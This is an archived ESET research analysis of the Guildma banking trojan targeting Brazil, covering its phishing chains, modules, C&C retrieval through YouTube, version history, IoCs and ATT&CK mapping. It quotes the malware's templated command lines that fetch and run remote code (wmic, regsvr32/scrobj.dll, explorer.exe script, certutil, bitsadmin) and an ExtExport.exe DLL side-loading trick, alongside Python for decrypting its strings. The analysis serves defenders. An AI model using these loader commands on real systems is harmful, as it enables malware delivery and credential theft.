{
	"id": "e66ac9c9-1bc9-4f6e-b6c8-b80a11d56e0c",
	"created_at": "2026-04-06T00:09:36.894456Z",
	"updated_at": "2026-04-10T13:11:31.25539Z",
	"deleted_at": null,
	"sha1_hash": "fd317d24cfe27e5226b2854dc62159721c2bc304",
	"title": "Guildma: The Devil drives electric",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 658605,
	"plain_text": "Guildma: The Devil drives electric\r\nBy ESET Research\r\nArchived: 2026-04-05 13:13:51 UTC\r\nIn this blogpost, we will examine Guildma (also known as Astaroth, a powerful demon), a highly prevalent Latin American banking trojan. This Brazil-targeting trojan, written in Delphi, boasts some innovative execution and attack techniques. We will describe the most recent version, highlighting the most notable changes made since the middle of 2019 when an avalanche of articles about Guildma was published in response to its largest campaign to date.\r\nCharacteristics\r\nGuildma is a Latin American banking trojan that targets Brazil exclusively. Based on our telemetry — as well as the public attention it has received — we believe it to be the most impactful and advanced banking trojan in the region. Besides targeting financial institutions, Guildma also attempts to steal credentials for email accounts, e‑shops and streaming services, and affects at least ten times as many victims as other Latin American banking trojans already described in this series. It uses innovative methods of execution and sophisticated attack techniques.\r\nUnlike the Latin American banking trojans we have described previously, Guildma does not store the fake pop-up windows it uses within the binary. Instead, the attack is orchestrated by its C\u0026C server. This gives the authors greater flexibility to react to countermeasures implemented by the targeted banks.\r\nGuildma implements the following backdoor functionalities:\r\nTaking screenshots\r\nCapturing keystrokes\r\nEmulating keyboard and mouse\r\nBlocking shortcuts (such as disabling Alt + F4 to make it harder to get rid of fake windows it may display)\r\nDownloading and executing files\r\nRestarting the machine\r\nGuildma is very modular. At the time of writing, it consists of 10 modules, not including distribution chain stages. The functionality of individual modules will be discussed later.\r\nEvolution of distribution chains\r\nOur telemetry indicates Guildma spreads exclusively through spam emails with malicious attachments. Here are a few examples from a campaign from the middle of November 2019.\r\nhttps://www.welivesecurity.com/2020/03/05/guildma-devil-drives-electric/\r\nPage 1 of 16\r\nFigure 1. Spam email example (translation: \"Hello, please explain these photos to me. I'm waiting for your explanation!\")\r\nFigure 2. Spam email example (translation: \"Dear member of consórcio, attached is the proof of bid no. 75432.\")\r\nFigure 3. Spam email example (translation: \"Good morning, I am sending the proof of transfer - DOC. Citibank\")\r\nFigure 4. Spam email example. Fake invoice reminder stating that a payment is due the day after tomorrow and that the payment may take up to 72 hours to be processed.\r\nOne of the defining characteristics of Guildma’s distribution chains is using tools already present on the system, often in new and unusual ways.\r\nAnother characteristic is reusing techniques. New techniques are added every once in a while, but for the most part, the developers seem to simply reuse techniques from older versions.\r\nFigure 5. Distribution chain of Guildma in version 150\r\nFigure 5 shows the distribution chain for version 150, but the structure of Guildma’s distribution chains is very dynamic. For instance, in previous versions, the malicious LNK file shown in Figure 5 was not embedded in a ZIP archive, or an SFX RAR archive containing an MSI installer was used instead. Also, there used to be another JScript stage whose sole purpose was downloading and executing the final JScript stage; there have been too many changes overall to fit into this article. In fact, the only part that has mostly stayed the same is the final JScript stage.\r\nUsing data from our long-term, in-depth tracking of this family, we have compiled a very good picture of Guildma’s activity.\r\nFigure 6 shows all ESET detections of Guildma’s first-stage component. As you can see, the campaigns were ramping up slowly until a massive campaign in August 2019, when we were seeing up to 50,000 samples per day. This campaign went on for almost two months and accounted for more than double the amount of detections we had seen in the 10 months prior.\r\nFigure 6. First stage Guildma detections since October 2018\r\nFollowing is a summary of some of the more interesting techniques used in the last 14 months.\r\nExecution of the JScript stage\r\nOver the last year, Guildma has used several methods of executing the JScript stages of its distribution chain. At the end of 2018, Guildma was hiding its code in eXtensible Stylesheet Language (.xsl) files and using wmic.exe to download and execute them:\r\nwmic.exe \u003cwmic query\u003e /format:\"\u003cURL\u003e\"\r\nIt then briefly moved on to using regsvr32.exe and scrobj.dll to download a JScript-implemented COM object and execute its registration routine (which contained the malicious code):\r\nregsvr32.exe /s /n /u /i:\u003cURL\u003e scrobj.dll\r\nMost recently, the authors started abusing Windows Explorer to execute the JScript stage. This attack relies on the fact that Windows Explorer will try to open any file passed to it on the command line with its associated program and the fact that the default association for .js files is the Microsoft Windows Script Host. The “script” passed to Windows Explorer is a single command whose purpose is to download and execute the actual JScript stage:\r\necho GetObject('script:\u003cURL\u003e') \u003e \u003cfile\u003e.js | explorer.exe \u003crandom switches\u003e \u003cfile\u003e.js\r\nExecution of the binary modules\r\nMethods of running the PE modules are no less diverse.\r\nWhen we started tracking Guildma, it was abusing Avast’s aswRunDll.exe to launch the first binary stage, with regsvr32.exe as a failover for computers where Avast’s products weren’t installed. The use of aswRunDll.exe was then dropped, leaving regsvr32.exe as the sole method of execution. After a brief period of using rundll32.exe, Guildma switched to its current execution method — ExtExport.exe.\r\nExtExport.exe is an undocumented component of Microsoft Internet Explorer used for exporting bookmarks from Mozilla Firefox and 360 Secure Browser, and can be abused for DLL Side-Loading. When the following command is executed, mozcrt19.dll, mozsqlite3.dll, and sqlite3.dll are loaded from the folder specified on the command line:\r\nC:\\Program Files\\Internet Explorer\\ExtExport.exe \u003cfolder\u003e \u003cdummy 1\u003e \u003cdummy 2\u003e\r\nTo abuse this, you would normally drop the DLL to be loaded as one of the above-mentioned files; Guildma uses all three.\r\nDownloading the binary modules\r\nGuildma has also utilized a couple of different ways to download the binary modules. The first version was using certutil.exe copied to certis.exe (presumably to evade detection):\r\ncertis.exe -urlcache -split -f \"\u003cURL\u003e\" \"\u003cdestination path\u003e\"\r\nThe authors then switched to BITSAdmin — the Microsoft Background Intelligent Transfer Service management tool — and are still using it at the time of writing:\r\nbitsadmin.exe /transfer \u003crandom number\u003e /priority foreground \u003cURL\u003e \u003cdestination\u003e\r\nFor a couple of months, the binary modules were base64-encoded and hosted on Google Cloud. In that time, Guildma was using both BITSAdmin and certutil — BITSAdmin to download the modules and certutil to decode them.\r\nOther changes\r\nGuildma uses strange, non-descriptive variable and function names. When we started tracking Guildma, the names, while nonsensical, were clearly man-made (e.g. “radador” for the random number function or “Bxaki” for the download function). In June 2019 they were all changed to random-looking names (e.g. “bx021” and “mrc430”). At first, we thought the authors had implemented some kind of automated script obfuscator, but it turned out to be a one-time change and the names have remained the same since.\r\nA relatively new addition is the age-old technique of using ADS (Alternate Data Streams) to store the binary modules. All the modules are now stored as ADS of a single file (e.g. “desktop.ini:nauwuygiaa.jpg”, “desktop.ini:nauwuygiab.jpg”, etc.).\r\nVersion history\r\nGuildma has seemingly gone through many versions during its development, but there was usually very little development between versions — due to its clunky architecture utilizing hardcoded configuration values, for the most part the authors have to recompile all the binaries for every new campaign, a job that is clearly not completely automated, since there has often been a significant delay between updating the version number in the scripts and in the binaries.\r\nIn this article, we cover version 150, but since we started writing, two more versions have been released. They contain no substantial change in functionality or distribution, supporting our claims about Guildma’s development cycle.\r\nThe final stage of the distribution chain used to contain a version name (and even before that, it used to download said name along with the binary modules), but it has been (presumably) permanently replaced with a simple “xXx” since version 148.\r\nTable 1 summarizes all the versions released since we started tracking Guildma actively in October 2018. Looking at the version strings, we get the feeling the author is passionate about ecology and fast cars.\r\nTable 1. Guildma version history\r\nFirst seen | Version number | Version name | Version prefix\r\n2018-09-18 | 131 | 131_SUPER_Tesla | marxvxinhhm\r\n2018-10-31 | 132 | 132_ULTRA_Tesla | srsysddirrx\r\n2018-11-28 | 133 | 133_TORRE_DE_Tesla | mxgetronicosxy\r\n2018-11-29 | 134 | 134_MAXX_TESLAs | dwqiopawsamazon\r\n2018-12-03 | 135 | 135_MOAB_TESLAs | lu769tsla\r\n2018-12-13 | 136 | 136_KRAKEN_TESLAs | lrdsnhrxxfery\r\n2019-02-06 | 137 | 137_RAPTOR_TESLAs | rakpat0rpcack\r\n2019-03-21 | 138 | 138_RAPTOR_TESLAs_ | hillwd763free\r\n2019-05-20 | 139 | 139_TESLA_ | falxconxrenw\r\n2019-06-03 | 140 | 140_ASTH_ | valehraysystqx\r\n2019-06-24 | 141 | 141_T3SL4S_ | ayt3ese4xw\r\n2019-07-17 | 142 | 142_T3SL4S_ | halawxtz\r\n2019-08-09 | 143 | 143_T3SL4S_ | asmonnwqk\r\n2019-08-26 | 144 | 144_MULT1T3SL4S_ | daffsyshqy\r\n2019-09-26 | 145 | 145_MULT1T3SL4S_ | landoqeahjky\r\n2019-10-16 | 146 | 146_MULT1T3SL4S_ | valkanxpca\r\n2019-11-04 | 147 | 147_MULT1T3SL4S_ | koddsuffy\r\n2019-11-19 | 148 | xXx | lpquayevvt\r\n2019-11-22 | 149 | xXx | nauwuygia\r\n2019-12-13 | 150 | xXx | andrealfo\r\n2020-01-14 | 151 | xXx | balberith\r\n2020-02-05 | 152 | xXx | masihaddajjal\r\nModule overview\r\nAs mentioned earlier, Guildma is very modular; the structure of its modules seems to be mostly constant. In this section, we will briefly describe the functionality of each module.\r\nAll module names are composed of a shared, version-dependent prefix and a module-specific suffix. In Table 2, the version-dependent prefix is andrealfo.\r\nTable 2. Guildma module overview\r\nURL filename | Filesystem filename | Module\r\nandrealfohh1a.dll.zip | andrealfo64.~ | Main module loader 1 (part 1)\r\nandrealfohh1b.dll.zip | andrealfo64.~ | Main module loader 1 (part 2)\r\nandrealfoxa.gif.zip | andrealfoxa.gif | Main module injector (part 1)\r\nandrealfoxb.gif.zip | andrealfoxb.gif | Main module injector (part 2)\r\nandrealfoxc.gif.zip | andrealfoxc.gif | Main module injector (part 3)\r\nandrealfogx.gif.zip | andrealfogx.gif | Main module loader 2\r\nandrealfog.gif.zip | andrealfog.gif | Main module\r\nandrealfoc.jpg.zip | andrealfoc.jpg | Contacts stealer and form grabber module\r\nandrealfodwwn.gif.zip | andrealfodwwn.gif | RAT module (DLL)\r\nandrealfodx.gif.zip | andrealfodx.gif | RAT module (EXE)\r\nandrealfoa.jpg.zip | andrealfoa.jpg | MailPassView\r\nandrealfob.jpg.zip | andrealfob.jpg | WebBrowserPassView\r\nandrealfoi.gif.zip | andrealfoi.gif | JScript dropper module\r\nWith the exception of the main module loader 1 (*64.~) and the main module injector (*xa.gif, *xb.gif and *xc.gif), all the modules are encrypted with a simple XOR cipher using a repeating 32-byte key. The key is generated from a 32-bit seed using the algorithm shown in Figure 7. The seed value is obfuscated in the binaries to prevent simple extraction (see Figure 8).\r\n# Derive the repeating 32-byte XOR key from the 32-bit seed: one key byte per shift\r\nkey = bytearray()\r\nfor i in range(32):\r\n    key.append(seed \u0026 0xff)\r\n    seed \u003e\u003e= 1\r\nFigure 7. Key generation algorithm\r\nFigure 8. Seed obfuscation in the binary\r\nThree modules communicate with a C\u0026C server: Main module, RAT module, and Contacts stealer and form grabber. The communication is done over HTTP(S) using a combination of base64 and various simple custom encryption algorithms to protect the data being transferred.\r\nIn the next section, we describe how the C\u0026C server address is obtained.\r\nMain module loader 1 (*64.~)\r\nThis is the first binary stage of the chain. The file is a DLL downloaded in two parts, which are concatenated by the previous JScript stage. It loads the three files comprising the next stage loader (*xa.gif, *xb.gif and *xc.gif), concatenates them, maps the resulting PE file into its own address space and executes it.\r\nLoading a PE file is a relatively complex process, so the authors used the BTMemoryModule open-source library for this purpose.\r\nMain module injector (*xa.gif + *xb.gif + *xc.gif)\r\nThis module loads the next stage (*gx.gif) from disk and decrypts it. It then runs the first existing executable from the following list and injects the decrypted payload into it.\r\nC:\\Program Files\\AVAST Software\\Avast\\aswRunDll.exe\r\nC:\\Program Files\\Diebold\\Warsaw\\unins000.exe *\r\nC:\\Windows\\SysWOW64\\userinit.exe\r\nC:\\Windows\\System32\\userinit.exe\r\n* An application, popular in Brazil, to protect access to online banking.\r\nMain module loader 2 (*gx.gif)\r\nThe last loader stage is very simple and seems to needlessly duplicate the functionality of main module loader 1. It loads and decrypts the main module (*g.gif), maps it into its own memory space and executes it.\r\nMain module (*g.gif)\r\nGuildma’s main module orchestrates all the remaining modules. Its implementation is deceptively complex, using countless timers and events, but its functionality is actually relatively simple. It contains legacy code that is not being used anymore as well as pre-production code that is not being used yet.\r\nOn loading, this module checks if it is running in a sandboxed environment (for example, by examining the computer name and system disk volume ID), if there are other running instances of itself (based on window names) and if the system locale is different from Portuguese. If any check reveals the system is uninteresting or already compromised by Guildma, the malware terminates.\r\nOtherwise, the module then collects information from the system (computer name, which security software is being used, installed programs…) and establishes contact with the C\u0026C server. It then starts monitoring interesting events, mainly when certain applications are launched or online banking sites opened, and executing appropriate actions (e.g. taking screenshots, preventing the user from closing the window by intercepting keyboard shortcuts, launching the RAT module, and so on).\r\nThe module also implements backdoor commands whose functionality largely overlaps with the RAT module.\r\nContacts stealer and form grabber (*c.jpg)\r\nThis module has two functions — gathering email addresses and form data from webpages.\r\nEmail addresses are obtained from desktop email clients (such as Microsoft Outlook, Thunderbird and The Bat!) by parsing their address books as well as the emails themselves.\r\nThe form grabber uses Windows COM technology to interact with Internet Explorer. It waits until a targeted site is opened (mostly Brazilian webmails, e-shops and payment gateways) and then logs the user out, forcing the victim to input credentials. It then retrieves the DOM and looks for important input field values (such as usernames, passwords and credit card numbers).\r\nRAT module (*dwwn.gif, *dx.gif)\r\nThe RAT module comes in two functionally identical compilations — DLL (*dwwn.gif) and EXE (*dx.gif).\r\nIt implements download and execute functionality, can take screenshots, emulate keyboard and mouse input, and restart the computer.\r\nMost Latin American banking trojans display fake pop-up windows based on monitoring the active window’s name. These windows are usually stored in the binary. We have not found such code in Guildma, but the RAT module contains a Delphi form implementing a simple web browser. Since it is also executed based on the active window’s name, we believe this form is used for displaying fake dialogs to the user.\r\nMailPassView (*a.jpg) and WebBrowserPassView (*b.jpg)\r\nThese are freeware tools from Nirsoft for extracting saved credentials from popular email clients and web browsers respectively. Since Nirsoft has removed support for quiet operation (output to file, with no GUI) from newer versions to curb the abuse of these tools by malware, Guildma’s authors are using older versions that had those features. The same tools are also leveraged by Mispadu, except Mispadu is using newer versions with quiet operation support patched back in.\r\nJScript dropper module (*i.gif)\r\nThis module drops and executes (using cscript.exe) a JScript file. The script consists of two parts — the first part is stored as one long encrypted string, while the second part is assembled from many short strings (some encrypted and some in plaintext). Worthy of note is the fact that strings in the dropped JScript file are encrypted by this dropper module with a randomly generated key, so they are present in the clear in the dropper.\r\nThe script executes the following actions:\r\nDisables UAC\r\nDisables EXE signature checking\r\nDisables Windows Defender\r\nCreates a firewall rule disabling network access for C:\\Program Files\\AVAST Software\\Avast\\Setup\\avast.setup\r\nDisables wsddntf driver (Diebold Warsaw GAS Tecnologia — the banking access protection software introduced earlier)\r\nAdds a firewall exception for files used as injection targets:\r\nC:\\Program Files\\Diebold\\Warsaw\\unins000.exe\r\nC:\\Program Files\\AVAST Software\\Avast\\aswRunDll.exe\r\nWe believe this module may still be in development as we have never observed it on our test machines dropping the script.\r\nNew developments (since mid-2019)\r\nNew C\u0026C retrieval\r\nIn version 142, a new way of distributing C\u0026C servers, abusing YouTube and Facebook profiles, was implemented. However, the authors stopped using Facebook almost immediately and, at the time of writing, are fully relying on YouTube. This is similar to Casbaneiro, but a bit cruder. While Casbaneiro was hiding the data in video descriptions and obfuscating it as a part of a URL, Guildma simply places the data in the channel description. The start and end of the encrypted C\u0026C addresses are delimited by “|||”. The data in between is base64 encoded and encrypted using Mispadu’s string encryption algorithm. This is now the primary method of retrieving C\u0026C servers; the old method (described by Avast) is still present as a backup.\r\nFigure 9. Encrypted Guildma C\u0026C server domains stored on YouTube\r\nModules added and removed\r\nThe previously described JScript dropper module was added in version 145. Conversely, in version 139, Guildma dropped two other modules present in older versions — mass mailer (*f.jpg) and its loader (*e.jpg). In the next few versions, these modules were still accessible under the expected names (\u003cversion prefix\u003ee.jpg and \u003cversion prefix\u003ef.jpg) from the same server as the other modules. This leads us to believe these modules are still being developed, but are now only distributed as needed, presumably using the download and execute backdoor command.\r\nNew string encryption\r\nThe JScript dropper module brought with it a new string encryption algorithm. A variant of this algorithm (shown in Figure 10) was propagated into other modules in version 147.\r\nfrom binascii import unhexlify\r\n\r\ndef decrypt(ct, key):\r\n    # stage 1 - hex decode, then XOR with the repeating key and subtract the previous ciphertext byte\r\n    ct = unhexlify(ct)\r\n    last = ct[0]\r\n    s = bytearray(ct[1:])\r\n    for i in range(len(s)):\r\n        x = s[i] ^ key[i % len(key)]\r\n        if last \u003e x:\r\n            x += 0xff\r\n        x -= last\r\n        last = s[i]\r\n        s[i] = x\r\n    # stage 2 - reverse string\r\n    s = s[::-1]\r\n    # stage 3 - c = not (c - 10)\r\n    s = \"\".join([chr((~(c - 10)) \u0026 0xff) for c in s])\r\n    # stage 4 - Base25 decode and key subtraction\r\n    k = ord(s[0]) - 65\r\n    ot = \"\"\r\n    for i in range(1, len(s), 2):\r\n        ot += chr((ord(s[i]) - 65) * 25 + ord(s[i + 1]) - 65 - k - 100)\r\n    return ot\r\nFigure 10. New string encryption algorithm\r\nOriginally, Guildma was using the same string encryption as Casbaneiro. The new algorithm has four stages and as you can see, the original string encryption algorithm is still used as the first stage. Also of note is the fact that the fourth stage is once again using Mispadu’s encryption algorithm.\r\nIn version 148 Guildma implemented a string table; all strings are decrypted at the beginning of execution and accessed from the table when needed.\r\nRemoval of international targets\r\nIn version 138, Guildma added the capability to target institutions (mainly banks) outside of Brazil. Despite that, we have observed no international campaigns; the campaigns hosting files on Cloudflare Workers’ infrastructure even went as far as to block any downloads from non-Brazilian IPs. In fact, in the last 14 months we haven’t seen any campaign targeting users outside of Brazil.\r\nFinally, in version 145, the capability to target institutions outside of Brazil was removed. Based on these facts, we believe it was merely an in-development feature which ended up being scrapped.\r\nConclusion\r\nIn this part of the series, we have talked about Guildma, the most prevalent Latin American banking trojan we have seen. We have shown its rich historical developments while focusing on the most recent variant.\r\nGuildma once again shares the prevailing characteristics of a Latin American banking trojan. It is written in Delphi, targets the region, implements backdoor functionality, splits its functionality into many modules and abuses legitimate tools.\r\nGuildma also shares interesting common features with families described earlier in this series. Namely, its current encryption algorithm combines the ones used by Casbaneiro and Mispadu.\r\nFor any inquiries, contact us at threatintel@eset.com. Indicators of Compromise can also be found in our GitHub repository.\r\nIndicators of Compromise (IoCs)\r\nHashes\r\nSHA-1 | Description | ESET Detection name\r\n45c58bc40768dce6a6c611e08fd34c62441aa776 | Main module loader 1 | Win32/Spy.Guildma.BM\r\n861f20b0dcc55f94b4c43e4a7e77f042c21506cf | Main module injector | Win32/Spy.Guildma.BJ\r\n37fd19b1ab1dcc25e07bc96d4c02d81cf4edb8a1 | Main module loader 2 | Win32/Spy.Guildma.Q\r\na7b10b8de2b0ef898cff31fa2d9d5cbaae2e9d0d | Main module | Win32/Spy.Guildma.BS\r\n4f65736a9d6b94b376c58b3cdcb49bbd295cd8cc | Contacts stealer and form grabber | Win32/Spy.Guildma.D\r\n6c9304c5862d4e0de1c86d7ae3764f5e8358daff | RAT module (DLL) | Win32/Spy.Guildma.BR\r\n89fbffe456de850f7abf4f97d3b9da4bad6afb57 | RAT module (EXE) | Win32/Spy.Guildma.BR\r\naf0d495ecc3622b14a40ddcd8005873c5ddc3a2d | MailPassView | Win32/PSWTool.MailPassView.E\r\n92bcf54079cbba04f584eac4486473c3abdd88cd | WebBrowserPassView | Win32/PSWTool.WebBrowserPassView.E\r\na2048f435f076988bf094274192a196216d75a5f | JScript dropper module | Win32/Spy.Guildma.BP\r\nFilenames\r\nC:\\Users\\Public\\Libraries\\qlanl\\*\r\nStartup link\r\nLocation\r\n%APPDATA%\\Microsoft\\Programs\\StartUp\\reiast%USERNAME%%COMPUTERNAME%.lnk\r\nTargets\r\nC:\\Program Files (x86)\\Internet Explorer\\ExtExport.exe\r\nC:\\Program Files\\Internet Explorer\\ExtExport.exe\r\nArgs\r\n\u003cinstall dir\u003e \u003crand\u003e \u003crand\u003e\r\n(where \u003crand\u003e is a random, 5 to 9 character long string generated from the alphabet qwertyuiop1lgfdsas2dfghj3zcvbnmm)\r\nC\u0026C servers\r\nMITRE ATT\u0026CK techniques\r\nTactic | ID | Name | Description\r\nInitial Access | T1193 | Spearphishing Attachment | Guildma distribution chains start with a malicious email attachment.\r\nExecution | T1073 | Rundll32 | Guildma utilizes rundll32.exe to execute its binary modules.\r\nExecution | T1047 | Windows Management Instrumentation | Guildma abuses WMIC.exe to execute some of its distribution chain stages.\r\nPersistence | T1060 | Registry Run Keys / Startup Folder | Guildma ensures persistence by creating a LNK file in the %STARTUP% folder.\r\nDefense Evasion | T1197 | BITS Jobs | BITSAdmin.exe is used to download binary modules.\r\nDefense Evasion | T1089 | Disabling Security Tools | Guildma disables Windows Defender.\r\nDefense Evasion | T1140 | Deobfuscate/Decode Files or Information | The majority of Guildma modules need to be decrypted after downloading.\r\nDefense Evasion | T1073 | DLL Side-Loading | Guildma abuses ExtExport.exe for DLL Side-Loading.\r\nDefense Evasion | T1096 | NTFS File Attributes | Guildma utilizes ADS to hide its modules on disk.\r\nDefense Evasion | T1055 | Process Injection | Guildma utilizes process injection when executing its modules.\r\nDefense Evasion | T1064 | Scripting | Guildma implements its distribution chain stages in various scripting languages (mainly JScript).\r\nDefense Evasion | T1220 | XSL Script Processing | Guildma utilizes XSL script(s) in its distribution chains.\r\nCredential Access | T1081 | Credentials in Files | Guildma extracts credentials stored by web browsers and email clients in files.\r\nCredential Access | T1214 | Credentials in Registry | Guildma extracts credentials stored by web browsers and email clients in Windows Registry.\r\nDiscovery | T1083 | File and Directory Discovery | Guildma uses presence of certain files to determine whether banking and security tools are installed.\r\nDiscovery | T1010 | Application Window Discovery | Guildma uses window discovery to find and terminate older versions of itself and to detect when interesting programs (e.g. banking applications or web browsers) are running.\r\nDiscovery | T1063 | Security Software Discovery | Guildma detects the presence of several security products.\r\nDiscovery | T1082 | System Information Discovery | Guildma collects OS version and bitness, computer name and system locale.\r\nDiscovery | T1497 | Virtualization/Sandbox Evasion | Guildma uses directory names, computer names, volume IDs, and existence of named objects to detect sandboxes and virtualized environments.\r\nCollection | T1113 | Screen Capture | Guildma is capable of taking screenshots.\r\nCommand and Control | T1024 | Custom Cryptographic Protocol | New C\u0026C addresses are encrypted using custom encryption algorithms.\r\nExfiltration | T1041 | Exfiltration Over Command and Control Channel | Guildma uploads screenshots and log files to the C\u0026C server.\r\nSource: https://www.welivesecurity.com/2020/03/05/guildma-devil-drives-electric/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://www.welivesecurity.com/2020/03/05/guildma-devil-drives-electric/"
	],
	"report_names": [
		"guildma-devil-drives-electric"
	],
	"threat_actors": [
		{
			"id": "bc289ba8-bc61-474c-8462-a3f7179d97bb",
			"created_at": "2022-10-25T16:07:24.450609Z",
			"updated_at": "2026-04-10T02:00:04.996582Z",
			"deleted_at": null,
			"main_name": "Avalanche",
			"aliases": [],
			"source_name": "ETDA:Avalanche",
			"tools": [],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775434176,
	"ts_updated_at": 1775826691,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/fd317d24cfe27e5226b2854dc62159721c2bc304.pdf",
		"text": "https://archive.orkl.eu/fd317d24cfe27e5226b2854dc62159721c2bc304.txt",
		"img": "https://archive.orkl.eu/fd317d24cfe27e5226b2854dc62159721c2bc304.jpg"
	}
}